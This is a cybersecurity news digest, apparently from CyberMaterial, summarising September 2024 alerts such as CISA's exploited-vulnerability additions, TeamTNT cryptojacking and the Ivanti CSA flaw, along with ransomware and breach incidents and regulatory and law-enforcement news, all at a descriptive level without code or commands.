π What are the latest cybersecurity alerts, incidents, and news?
CISA, Known Exploited Vulnerability, TeamTNT, Cryptojacking, CentOS, Servers, Rootkit, Ivanti, Cloud Appliance, Iran, UNC1860, Backdoors, Middle East, Networks, Splinter Tool, Red Team, Post-Exploitation, Compass Group, Ransomware, Altman Specialty Plants, Breach, BingX, Hot Wallet, Hack, Schools, Lancashire, UK, Disruption, Star Health, Sensitive Data, Leak, Telegram, FTC, Surveillance, Children, Social Media, Germany, Crypto Exchanges, Underground Economy, DDoS, Ransomware, Dominant, Cyber Threat, Europe, Phishing, Europol, HSBC, Quantum-Safe
Listen to the full podcast
π¨Β Cyber Alerts
The Cybersecurity and Infrastructure Security Agency (CISA) has added five new critical vulnerabilities to its Known Exploited Vulnerabilities Catalog, urging immediate action from organizations. The vulnerabilitiesβCVE-2024-27348 (Apache HugeGraph-Server), CVE-2020-0618 (Microsoft SQL Server Reporting Services), CVE-2019-1069 (Microsoft Windows Task Scheduler), CVE-2022-21445 (Oracle JDeveloper), and CVE-2020-14644 (Oracle WebLogic Server)βare being actively exploited by cybercriminals.
The notorious hacking group TeamTNT has launched a new cryptojacking campaign targeting CentOS-based Virtual Private Servers (VPS). Researchers from Group-IB revealed that the attackers gain access through brute-force attacks on Secure Shell (SSH) services, uploading malicious scripts that disable security measures, erase logs, and terminate competing cryptocurrency mining processes. The campaign also deploys the Diamorphine rootkit to hide malicious activities and establishes persistent remote access via cron jobs and backdoor accounts.
Ivanti has issued an urgent warning regarding a critical vulnerability in its Cloud Service Appliance (CSA), identified as CVE-2024-8963, which is actively being exploited in the wild. With a CVSS score of 9.4, this path traversal flaw allows remote unauthenticated attackers to access restricted functionalities. It can also be chained with another vulnerability, CVE-2024-8190, enabling attackers to bypass admin authentication and execute arbitrary commands.
Iran’s state-sponsored cyber group, UNC1860, has emerged as a significant threat in the Middle East, leveraging specialized tools and passive backdoors to infiltrate critical networks, particularly in government and telecommunications sectors. Tied to Iranβs Ministry of Intelligence and Security, UNC1860 operates as an initial access provider, facilitating cyber espionage and attacks by enabling third-party actors to gain remote access to compromised systems. Their sophisticated malware, including the TEMPLEPLAY and VIROGREEN controllers, showcases advanced capabilities for stealth and persistence, allowing them to evade detection and maintain long-term footholds.
Unit 42 cybersecurity researchers have uncovered a new post-exploitation red team tool named Splinter, developed in Rust and utilizing Advanced WildFireβs memory scanning capabilities. This tool is designed to simulate long-term access to target systems, expanding initial access through various methods. Splinter operates on a task-based model, communicating with a command and control (C2) server to execute commands, manage files, and gather data from cloud services.
π₯ Cyber Incidents
The Compass Group in North Sydney, Australia, has confirmed a second cyberattack this month by an affiliate of the Medusa ransomware gang. Following an initial breach that resulted in the theft of 785.5 gigabytes of sensitive data, the group has again targeted the company, with reports suggesting that over one terabyte of data may be compromised in this latest incident. This new attack, announced on September 18, includes employee records such as passports and medical certificates. The ransom for the latest breach is set at $100,000, significantly lower than the $2 million demanded after the first attack.
On September 18, 2024, Altman Specialty Plants notified the Texas Attorney General of a significant data breach that compromised sensitive consumer information, including names, Social Security numbers, financial account details, and medical information. The breach was detected on September 11, 2023, when suspicious activity within the companyβs network prompted an investigation, revealing unauthorized access to confidential files. Following the completion of the investigation in July 2024, Altman began sending notification letters to affected individuals, detailing the compromised information.
BingX, the Singapore-based crypto exchange, has confirmed a “minor asset loss” following suspicious activity detected in one of its hot wallets. Chief product officer Vivien Lin reported that the technical team identified abnormal network access early on September 20, prompting immediate emergency measures, including asset transfers and the suspension of withdrawals. Initial estimates of the outflow were reported as high as $26.7 million by blockchain security firms, although Lin stated the losses are small and manageable.
Schools across Lancashire, UK have been significantly disrupted by a ransomware cyber attack that has infected the IT infrastructure of the Fylde Coast Academy Trust, affecting all ten of its academies, including several high and primary schools. CEO Dean Logan confirmed that the attack has rendered most computer systems inaccessible, prompting a shift to non-IT-based processes for the time being. While the full extent of the damage is still being assessed, the trust has received swift support from the Department of Education and cybersecurity teams.
Sensitive medical records and personal information from millions of customers of Indiaβs largest health insurer, Star Health, have been found exposed through chatbots on the messaging platform Telegram. Security researcher Jason Parker alerted Reuters to the alarming discovery, revealing that these chatbots offer access to policy and claims documents, including names, phone numbers, addresses, tax details, and even medical diagnoses and test results.
π’ Cyber News
A recent Federal Trade Commission (FTC) report has uncovered widespread surveillance practices by major social media and video streaming companies, specifically targeting children and teens. Following an investigation that began in December 2020, the FTC found that these platforms, including Amazon, Meta, YouTube, and TikTok, engage in extensive data collection and retention, often without adequate privacy protections. The report highlights significant concerns over how these companies monetize personal data, raising risks of identity theft and other harms.
German authorities have shut down 47 cryptocurrency exchanges accused of facilitating an “underground economy” for cybercriminals. The Federal Criminal Police Office, along with Frankfurt’s main prosecutor and cybercrime units, stated that these exchanges were involved in concealing the origins of criminally obtained funds and failing to meet anti-money laundering regulations. The government has warned users that their data has been seized, including transactions, registration details, and IP addresses.
A recent report from the European Union Agency for Cybersecurity (ENISA) reveals that Distributed Denial of Service (DDoS) attacks have surpassed ransomware as the most prevalent cyber threat in Europe. From July 2023 to June 2024, nearly half of all cyberattacks in the EU were DDoS incidents, accounting for 41.1% of the total, while ransomware represented 25.8%. The report highlights the significant increase in cyber activity, with NoName057, a pro-Russian hacktivist group, emerging as the most active threat actor.
In a groundbreaking initiative, Europol and Ameripol have successfully dismantled a phishing-as-a-service network that affected over 480,000 victims worldwide. Known as “Operation Kaerb,” this coordinated effort targeted a criminal group primarily operating in Spain and Latin America, responsible for unlocking stolen mobile phones through phishing attacks. During a series of raids across several countries from September 10 to 17, law enforcement arrested 17 individuals and seized numerous items, including mobile phones and weapons.
HSBC has successfully trialled quantum-safe technology to enhance the security of tokenized physical gold transactions. This pilot marks a significant advancement for HSBC, which was the first global bank to offer tokenized gold to institutional investors and later to retail investors in Hong Kong. Utilizing post-quantum cryptography (PQC) and technology from partner Quantinuum, the pilot aims to protect digital assets from potential quantum computing attacks.
Copyright Β© 2024 CyberMaterial. All Rights Reserved.
